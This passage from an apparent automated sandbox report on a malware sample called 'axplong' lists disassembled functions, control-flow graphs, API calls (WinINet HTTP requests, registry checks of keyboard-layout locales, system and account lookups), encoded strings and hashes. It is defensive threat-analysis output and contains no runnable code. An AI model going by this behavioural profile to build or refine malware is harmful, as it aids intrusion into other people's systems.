                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                        • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4p$invalid stoi argument$stoi argument out of range
                        • API String ID: 688256393-4154584363
                        • Opcode ID: 36f7fce50c457029579808f5818b73826cfb54f0601079d47db6fe9429690271
                        • Instruction ID: d7f05264d76ada47f6b8a6a4828dc58e79c2e1532d40b275903005672b89c27f
                        • Opcode Fuzzy Hash: 36f7fce50c457029579808f5818b73826cfb54f0601079d47db6fe9429690271
                        • Instruction Fuzzy Hash: 58B1E5B16001189BEB24DF28CC84BEDBB6AEF46314F5041ADF50897282D7759EC0CF98
                        Function 006A65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1141 6a65b0-6a6609 1215 6a660a call 52e0e3e 1141->1215 1216 6a660a call 52e0ded 1141->1216 1217 6a660a call 52e0dab 1141->1217 1218 6a660a call 52e0d49 1141->1218 1219 6a660a call 52e0d36 1141->1219 1220 6a660a call 52e0d66 1141->1220 1221 6a660a call 52e0dd4 1141->1221 1222 6a660a call 52e0e24 1141->1222 1223 6a660a call 52e0e14 1141->1223 1224 6a660a call 52e0d92 1141->1224 1142 6a660f-6a6688 LookupAccountNameA call 6b7870 call 6a5b20 1148 6a668a 1142->1148 1149 6a668c-6a66ab call 6a2280 1142->1149 1148->1149 1152 6a66dc-6a66e2 1149->1152 1153 6a66ad-6a66bc 1149->1153 1156 6a66e5-6a66ea 1152->1156 1154 6a66be-6a66cc 1153->1154 1155 6a66d2-6a66d9 call 6bd593 1153->1155 1154->1155 1158 6a6907 call 6d6b9a 1154->1158 1155->1152 1156->1156 1157 6a66ec-6a6714 call 6b7870 call 6a5b20 1156->1157 1169 6a6718-6a6739 call 6a2280 1157->1169 1170 6a6716 1157->1170 1164 6a690c call 6d6b9a 1158->1164 1168 6a6911-6a6916 call 6d6b9a 1164->1168 1175 6a676a-6a677e 1169->1175 1176 6a673b-6a674a 1169->1176 1170->1169 1181 6a6828-6a684c 1175->1181 1182 6a6784-6a678a 1175->1182 1177 6a674c-6a675a 1176->1177 1178 6a6760-6a6767 call 6bd593 1176->1178 1177->1164 1177->1178 1178->1175 1185 6a6850-6a6855 1181->1185 1184 6a6790-6a67bd call 6b7870 call 6a5b20 1182->1184 1199 6a67bf 1184->1199 1200 6a67c1-6a67e8 call 6a2280 1184->1200 1185->1185 1186 6a6857-6a68bc call 6b7f30 * 2 1185->1186 1196 6a68e9-6a6906 call 6bcf21 1186->1196 1197 6a68be-6a68cd 1186->1197 1201 6a68df-6a68e6 call 6bd593 1197->1201 1202 6a68cf-6a68dd 1197->1202 1199->1200 1208 6a67ea-6a67f9 1200->1208 1209 6a6819-6a681c 1200->1209 1201->1196 1202->1168 1202->1201 1211 6a67fb-6a6809 1208->1211 1212 6a680f-6a6816 call 6bd593 1208->1212 1209->1184 1210 6a6822 1209->1210 1210->1181 1211->1158 1211->1212 1212->1209 1215->1142 1216->1142 1217->1142 1218->1142 1219->1142 1220->1142 1221->1142 1222->1142 1223->1142 1224->1142
                        APIs
                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 006A6650
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountLookupName
                        • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                        • API String ID: 1484870144-3856690409
                        • Opcode ID: 21d664e3fb48b7480db445c5c097e27d48d1aef4c18351ee5e25ee89af8c1ee5
                        • Instruction ID: d53627b5817c07ffeea761897cc8be401c70038110a3b7b1dd963fcc4d4c0271
                        • Opcode Fuzzy Hash: 21d664e3fb48b7480db445c5c097e27d48d1aef4c18351ee5e25ee89af8c1ee5
                        • Instruction Fuzzy Hash: 7991A5B19001189BDB28EB24CC85BEDB77AEB45304F4445EDF51997282DA349FC4CFA9
                        Function 006B46C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006B7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006B795C
                          • Part of subcall function 006B7870: __Cnd_destroy_in_situ.LIBCPMT ref: 006B7968
                          • Part of subcall function 006B7870: __Mtx_destroy_in_situ.LIBCPMT ref: 006B7971
                          • Part of subcall function 006ABD60: InternetOpenW.WININET(006F8D70,00000000,00000000,00000000,00000000), ref: 006ABDED
                          • Part of subcall function 006ABD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006ABE11
                          • Part of subcall function 006ABD60: HttpOpenRequestA.WININET(?,00000000), ref: 006ABE5B
                        • std::_Xinvalid_argument.LIBCPMT ref: 006B4EA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                        • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-p
                        • API String ID: 2414744145-741609160
                        • Opcode ID: 43cecadd845cdc378fb50b7270f078032d9fca0bf43d0fe33dbdedf9dff0298b
                        • Instruction ID: 95397138c0509205f5b454465be6c17bc3c5b88e24b1e2b8d8d24a1d04ada0e0
                        • Opcode Fuzzy Hash: 43cecadd845cdc378fb50b7270f078032d9fca0bf43d0fe33dbdedf9dff0298b
                        • Instruction Fuzzy Hash: B523F3B1A001589BEB19DB28CD897DDBB779B81304F5481DCE009AB2C6EB399FC48F55
                        Function 006A5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 915 6a5df0-6a5eee 921 6a5f18-6a5f25 call 6bcf21 915->921 922 6a5ef0-6a5efc 915->922 923 6a5f0e-6a5f15 call 6bd593 922->923 924 6a5efe-6a5f0c 922->924 923->921 924->923 926 6a5f26-6a60ad call 6d6b9a call 6be080 call 6b7f30 * 5 RegOpenKeyExA 924->926 944 6a6478-6a6481 926->944 945 6a60b3-6a6143 call 6d4020 926->945 946 6a64ae-6a64b7 944->946 947 6a6483-6a648e 944->947 974 6a6149-6a614d 945->974 975 6a6466-6a6472 945->975 951 6a64b9-6a64c4 946->951 952 6a64e4-6a64ed 946->952 949 6a6490-6a649e 947->949 950 6a64a4-6a64ab call 6bd593 947->950 949->950 954 6a659e-6a65a3 call 6d6b9a 949->954 950->946 956 6a64da-6a64e1 call 6bd593 951->956 957 6a64c6-6a64d4 951->957 958 6a651a-6a6523 952->958 959 6a64ef-6a64fa 952->959 956->952 957->954 957->956 961 6a654c-6a6555 958->961 962 6a6525-6a6530 958->962 966 6a64fc-6a650a 959->966 967 6a6510-6a6517 call 6bd593 959->967 971 6a6582-6a659d call 6bcf21 961->971 972 6a6557-6a6566 961->972 969 6a6542-6a6549 call 6bd593 962->969 970 6a6532-6a6540 962->970 966->954 966->967 967->958 969->961 970->954 970->969 979 6a6578-6a657f call 6bd593 972->979 980 6a6568-6a6576 972->980 981 6a6153-6a6187 RegEnumValueW 974->981 982 6a6460 974->982 975->944 979->971 980->954 980->979 986 6a644d-6a6454 981->986 987 6a618d-6a61ad 981->987 982->975 986->981 990 6a645a 986->990 992 6a61b0-6a61b9 987->992 990->982 992->992 993 6a61bb-6a624d call 6b7c50 call 6b8090 call 6b7870 * 2 call 6a5c60 992->993 993->986
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                        • API String ID: 0-3963862150
                        • Opcode ID: 866f9671e303e57425a6b540378b7dd8103258a20d588aa890688551c34f45ca
                        • Instruction ID: 8ee4eda84714444a4204f14bac3a34fdd9a291478101c6213516a5aa98929375
                        • Opcode Fuzzy Hash: 866f9671e303e57425a6b540378b7dd8103258a20d588aa890688551c34f45ca
                        • Instruction Fuzzy Hash: 29E17C71900218AFEB24EBA4CC89BEDB7BAEF05304F5442D9E509A7291DB749FC48F51
                        Function 006A7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1003 6a7d00-6a7d82 call 6d4020 1007 6a7d88-6a7db0 call 6b7870 call 6a5b20 1003->1007 1008 6a827e-6a829b call 6bcf21 1003->1008 1015 6a7db2 1007->1015 1016 6a7db4-6a7dd6 call 6b7870 call 6a5b20 1007->1016 1015->1016 1021 6a7dda-6a7df3 1016->1021 1022 6a7dd8 1016->1022 1025 6a7e24-6a7e4f 1021->1025 1026 6a7df5-6a7e04 1021->1026 1022->1021 1029 6a7e80-6a7ea1 1025->1029 1030 6a7e51-6a7e60 1025->1030 1027 6a7e1a-6a7e21 call 6bd593 1026->1027 1028 6a7e06-6a7e14 1026->1028 1027->1025 1028->1027 1033 6a829c call 6d6b9a 1028->1033 1031 6a7ea3-6a7ea5 GetNativeSystemInfo 1029->1031 1032 6a7ea7-6a7eac 1029->1032 1035 6a7e62-6a7e70 1030->1035 1036 6a7e76-6a7e7d call 6bd593 1030->1036 1037 6a7ead-6a7eb6 1031->1037 1032->1037 1044 6a82a1-6a82a6 call 6d6b9a 1033->1044 1035->1033 1035->1036 1036->1029 1042 6a7eb8-6a7ebf 1037->1042 1043 6a7ed4-6a7ed7 1037->1043 1046 6a8279 1042->1046 1047 6a7ec5-6a7ecf 1042->1047 1048 6a821f-6a8222 1043->1048 1049 6a7edd-6a7ee6 1043->1049 1046->1008 1051 6a8274 1047->1051 1048->1046 1054 6a8224-6a822d 1048->1054 1052 6a7ee8-6a7ef4 1049->1052 1053 6a7ef9-6a7efc 1049->1053 1051->1046 1052->1051 1056 6a81fc-6a81fe 1053->1056 1057 6a7f02-6a7f09 1053->1057 1058 6a822f-6a8233 1054->1058 1059 6a8254-6a8257 1054->1059 1062 6a820c-6a820f 1056->1062 1063 6a8200-6a820a 1056->1063 1064 6a7fe9-6a81e5 call 6b7870 call 6a5b20 call 6b7870 call 6a5b20 call 6a5c60 call 6b7870 call 6a5b20 call 6a5640 call 6b7870 call 6a5b20 call 6b7870 call 6a5b20 call 6a5c60 call 6b7870 call 6a5b20 call 6a5640 call 6b7870 call 6a5b20 call 6b7870 call 6a5b20 call 6a5c60 call 6b7870 call 6a5b20 call 6a5640 1057->1064 1065 6a7f0f-6a7f6b call 6b7870 call 6a5b20 call 6b7870 call 6a5b20 call 6a5c60 1057->1065 1066 6a8248-6a8252 1058->1066 1067 6a8235-6a823a 1058->1067 1060 6a8259-6a8263 1059->1060 1061 6a8265-6a8271 1059->1061 1060->1046 1061->1051 1062->1046 1069 6a8211-6a821d 1062->1069 1063->1051 1102 6a81eb-6a81f4 1064->1102 1088 6a7f70-6a7f77 1065->1088 1066->1046 1067->1066 1071 6a823c-6a8246 1067->1071 1069->1051 1071->1046 1090 6a7f7b-6a7f9b call 6d8a81 1088->1090 1091 6a7f79 1088->1091 1098 6a7f9d-6a7fac 1090->1098 1099 6a7fd2-6a7fd4 1090->1099 1091->1090 1103 6a7fae-6a7fbc 1098->1103 1104 6a7fc2-6a7fcf call 6bd593 1098->1104 1101 6a7fda-6a7fe4 1099->1101 1099->1102 1101->1102 1102->1048 1106 6a81f6 1102->1106 1103->1044 1103->1104 1104->1099 1106->1056
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006A7EA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                        • API String ID: 1721193555-2057465332
                        • Opcode ID: 09ebf98a8df59726804081c8beb613d7fa7f87ac420afadfafd5d6c90c39a71a
                        • Instruction ID: 6575b1b74ec69792de74408c8396b3b2c23112a1f41bc8b1be5cd842e287f567
                        • Opcode Fuzzy Hash: 09ebf98a8df59726804081c8beb613d7fa7f87ac420afadfafd5d6c90c39a71a
                        • Instruction Fuzzy Hash: CCD1A3B1E00604DBDB14FB68CC5A3AD7667AB82320F54429CE4166B3D2DB395F818BD6
                        Function 006D6E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1225 6d6e01-6d6e36 GetFileType 1226 6d6e3c-6d6e47 1225->1226 1227 6d6eee-6d6ef1 1225->1227 1228 6d6e69-6d6e85 call 6d4020 GetFileInformationByHandle 1226->1228 1229 6d6e49-6d6e5a call 6d7177 1226->1229 1230 6d6f1a-6d6f42 1227->1230 1231 6d6ef3-6d6ef6 1227->1231 1241 6d6f0b-6d6f18 call 6d740d 1228->1241 1246 6d6e8b-6d6ecd call 6d70c9 call 6d6f71 * 3 1228->1246 1243 6d6f07-6d6f09 1229->1243 1244 6d6e60-6d6e67 1229->1244 1232 6d6f5f-6d6f61 1230->1232 1233 6d6f44-6d6f57 1230->1233 1231->1230 1236 6d6ef8-6d6efa 1231->1236 1238 6d6f62-6d6f70 call 6bcf21 1232->1238 1233->1232 1248 6d6f59-6d6f5c 1233->1248 1240 6d6efc-6d6f01 call 6d7443 1236->1240 1236->1241 1240->1243 1241->1243 1243->1238 1244->1228 1261 6d6ed2-6d6eea call 6d7096 1246->1261 1248->1232 1261->1232 1264 6d6eec 1261->1264 1264->1243
                        APIs
                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 006D6E23
                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 006D6E7D
                        • __dosmaperr.LIBCMT ref: 006D6F12
                          • Part of subcall function 006D7177: __dosmaperr.LIBCMT ref: 006D71AC
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: File__dosmaperr$HandleInformationType
                        • String ID:
                        • API String ID: 2531987475-0
                        • Opcode ID: 735de863680251b4a8978039cc9afe461c09cd0f0e6c8079c91a0b1a8cc29abf
                        • Instruction ID: f6a46f7c542bfe0b6d3f5ac89e3fc8616597cb7b2a78fcd39c8a8dcc3c65e070
                        • Opcode Fuzzy Hash: 735de863680251b4a8978039cc9afe461c09cd0f0e6c8079c91a0b1a8cc29abf
                        • Instruction Fuzzy Hash: 58414D76D00644ABCB24EFB5EC459ABB7FAEF88300B14452EF456D3750EB309905CB65
                        Function 006DD4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1360 6dd4f4-6dd515 call 6bdeb0 1363 6dd52f-6dd532 1360->1363 1364 6dd517 1360->1364 1365 6dd54e-6dd55a call 6da688 1363->1365 1367 6dd534-6dd537 1363->1367 1364->1365 1366 6dd519-6dd51f 1364->1366 1378 6dd55c-6dd55f 1365->1378 1379 6dd564-6dd570 call 6dd47e 1365->1379 1369 6dd521-6dd525 1366->1369 1370 6dd543-6dd54c call 6dd43c 1366->1370 1367->1370 1371 6dd539-6dd53c 1367->1371 1369->1365 1374 6dd527-6dd52b 1369->1374 1382 6dd58c-6dd595 1370->1382 1375 6dd53e-6dd541 1371->1375 1376 6dd572-6dd582 call 6d7443 call 6d6b8a 1371->1376 1374->1376 1380 6dd52d 1374->1380 1375->1370 1375->1376 1376->1378 1383 6dd6cb-6dd6da 1378->1383 1379->1376 1393 6dd584-6dd589 1379->1393 1380->1370 1386 6dd597-6dd59f call 6d8c8b 1382->1386 1387 6dd5a2-6dd5b3 1382->1387 1386->1387 1391 6dd5c9 1387->1391 1392 6dd5b5-6dd5c7 1387->1392 1396 6dd5cb-6dd5dc 1391->1396 1392->1396 1393->1382 1397 6dd5de-6dd5e0 1396->1397 1398 6dd64a-6dd65a call 6dd687 1396->1398 1400 6dd6db-6dd6dd 1397->1400 1401 6dd5e6-6dd5e8 1397->1401 1409 6dd65c-6dd65e 1398->1409 1410 6dd6c9 1398->1410 1405 6dd6df-6dd6e6 call 6d8cd3 1400->1405 1406 6dd6e7-6dd6fa call 6d651d 1400->1406 1403 6dd5ea-6dd5ed 1401->1403 1404 6dd5f4-6dd600 1401->1404 1403->1404 1411 6dd5ef-6dd5f2 1403->1411 1412 6dd640-6dd648 1404->1412 1413 6dd602-6dd617 call 6dd4eb * 2 1404->1413 1405->1406 1426 6dd6fc-6dd706 1406->1426 1427 6dd708-6dd70e 1406->1427 1416 6dd699-6dd6a2 1409->1416 1417 6dd660-6dd676 call 6da531 1409->1417 1410->1383 1411->1404 1418 6dd61a-6dd61c 1411->1418 1412->1398 1413->1418 1436 6dd6a5-6dd6a8 1416->1436 1417->1436 1418->1412 1420 6dd61e-6dd62e 1418->1420 1425 6dd630-6dd635 1420->1425 1425->1398 1431 6dd637-6dd63e 1425->1431 1426->1427 1432 6dd73c-6dd747 call 6d7443 1426->1432 1433 6dd727-6dd738 RtlAllocateHeap 1427->1433 1434 6dd710-6dd711 1427->1434 1431->1425 1443 6dd749-6dd74b 1432->1443 1437 6dd73a 1433->1437 1438 6dd713-6dd71a call 6d9c81 1433->1438 1434->1433 1441 6dd6aa-6dd6ad 1436->1441 1442 6dd6b4-6dd6bc 1436->1442 1437->1443 1438->1432 1450 6dd71c-6dd725 call 6d8cf9 1438->1450 1441->1442 1446 6dd6af-6dd6b2 1441->1446 1442->1410 1447 6dd6be-6dd6c6 call 6da531 1442->1447 1446->1410 1446->1442 1447->1410 1450->1432 1450->1433
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: hpGm
                        • API String ID: 0-119319687
                        • Opcode ID: b8f32fc9b6b472bf10cf89feec7a041e73dd5cd12a0a8c10f77bf9ad07d6f0d1
                        • Instruction ID: 4cc209cd7b0f0f6cab954624f3f75ef805c55481f4d6fe4397e5a33b0bd3e9af
                        • Opcode Fuzzy Hash: b8f32fc9b6b472bf10cf89feec7a041e73dd5cd12a0a8c10f77bf9ad07d6f0d1
                        • Instruction Fuzzy Hash: 56610372D002149FDF25FFA8E8856EDBBB3AF55314F24811BE448AB390D6309C01CBA5
                        Function 006A82B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1454 6a82b0-6a8331 call 6d4020 1458 6a833d-6a8365 call 6b7870 call 6a5b20 1454->1458 1459 6a8333-6a8338 1454->1459 1467 6a8369-6a838b call 6b7870 call 6a5b20 1458->1467 1468 6a8367 1458->1468 1460 6a847f-6a849b call 6bcf21 1459->1460 1473 6a838f-6a83a8 1467->1473 1474 6a838d 1467->1474 1468->1467 1477 6a83aa-6a83b9 1473->1477 1478 6a83d9-6a8404 1473->1478 1474->1473 1479 6a83bb-6a83c9 1477->1479 1480 6a83cf-6a83d6 call 6bd593 1477->1480 1481 6a8431-6a8452 1478->1481 1482 6a8406-6a8415 1478->1482 1479->1480 1487 6a849c-6a84a1 call 6d6b9a 1479->1487 1480->1478 1485 6a8458-6a845d 1481->1485 1486 6a8454-6a8456 GetNativeSystemInfo 1481->1486 1483 6a8427-6a842e call 6bd593 1482->1483 1484 6a8417-6a8425 1482->1484 1483->1481 1484->1483 1484->1487 1491 6a845e-6a8465 1485->1491 1486->1491 1491->1460 1496 6a8467-6a846f 1491->1496 1497 6a8478-6a847b 1496->1497 1498 6a8471-6a8476 1496->1498 1497->1460 1499 6a847d 1497->1499 1498->1460 1499->1460
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 006A8454
                        Memory Dump Source
